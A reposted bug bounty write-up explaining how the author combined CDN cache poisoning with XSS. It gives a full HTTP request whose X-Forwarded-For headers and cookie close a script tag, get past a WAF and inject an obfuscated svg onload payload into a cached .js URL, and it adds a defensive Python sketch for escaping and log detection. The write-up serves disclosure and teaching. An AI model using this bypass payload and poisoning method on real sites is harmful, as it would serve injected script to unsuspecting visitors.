How I Made +$16,500 Hacking CDN Caching Servers — Part 2
2022-2-3 00:30:55 Author: infosecwriteups.com (view original) Views: 22

Bounty: $2,000

While Google Dorking, I found a particular URL. This time the response was not being cached, but if I appended a cacheable file extension (.js, .css) to the end of the URL, the response would be cached.

Now all I needed was to find an XSS. I found an injection point in a cookie, but the WAF would trigger when I added anything after %20:

Cookie: cookiename=xss</script%20

While trying to bypass the WAF, I realized that my IP was also being reflected in that same script:

guid="</script ","24.99.19.20"

Since my IP was being reflected, I tried the “X-Forwarded-For” header; this way I could close the <script> tag and avoid the WAF, which would trigger whenever it detected <[anything]>.

This is why you will see three “X-Forwarded-For” headers in the request.

Request:

GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2
Host: Redacted
X-Forwarded-For: xss
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`//
X-Forwarded-For: >
Cookie: gdId=xss</script%20

Response:

...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">
...

After poisoning the URL with the XSS, an attacker just needed to send it to the victim:

redacted.com/xxx/xx/xxx.xx/x.js?t=2021111121

A nice way to hide an XSS :D
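As an added example (not part of the original write-up and not the affected site's code), here is a Python sketch of the defender's side of this bug: the forwarded-address handling and inline-script rendering that would have kept the reflected value harmless, plus a log check that flags cacheable static paths requested with non-IP X-Forwarded-For values. The function names, the header samples and the ".js/.css is cacheable" rule are assumptions modelled on the write-up.

```python
import ipaddress
import json
import re

# Constructed headers modelled on the write-up: several X-Forwarded-For
# headers, most of which carry markup rather than an address.
SAMPLE_HEADERS = [
    ("X-Forwarded-For", "xss"),
    ("X-Forwarded-For", "xss><svg/onload=1//"),
    ("X-Forwarded-For", ">"),
    ("X-Forwarded-For", "24.99.19.20, 10.0.0.7"),
]

# Assumed cache rule from the write-up: paths ending in .js or .css get cached.
CACHEABLE_EXT = re.compile(r"\.(js|css)(\?|$)")


def forwarded_entries(headers):
    """Collect every comma-separated entry from all X-Forwarded-For headers."""
    entries = []
    for name, value in headers:
        if name.lower() == "x-forwarded-for":
            entries.extend(part.strip() for part in value.split(","))
    return entries


def is_ip(entry):
    """True only if the entry parses as an IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(entry)
        return True
    except ValueError:
        return False


def client_ips(headers):
    """Keep only entries that are real addresses; markup like '>' is dropped."""
    return [e for e in forwarded_entries(headers) if is_ip(e)]


def script_literal(value):
    """JSON-encode for an inline <script>; '</' becomes '<\\/' so '</script' cannot close the tag."""
    return json.dumps(value).replace("</", "<\\/")


def render_guid_script(headers, guid):
    """Hardened counterpart of the reflected 'guid=' line from the write-up."""
    ips = client_ips(headers)
    first_ip = ips[0] if ips else ""
    return "guid=[%s,%s]" % (script_literal(guid), script_literal(first_ip))


def suspicious_request(path, headers):
    """Detection: a cacheable static path requested with non-IP forwarded values."""
    malformed = [e for e in forwarded_entries(headers) if not is_ip(e)]
    return bool(CACHEABLE_EXT.search(path)) and bool(malformed)
```

Even with the reflection fixed, a response that varies on an unkeyed header should not be cached under a key that ignores that header; the detection check is a stopgap for spotting attempts in access logs, not a substitute for fixing the cache key.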

This was my favorite cache poisoning finding. It was found on a public program, and hopefully we can disclose it in the near future :)


Source: https://infosecwriteups.com/how-i-made-16-500-hacking-cdn-caching-servers-part-2-4995ece4c6e6?source=rss----7b722bfd1b8d--bug_bounty
For infringement claims, contact: admin#unsafe.sh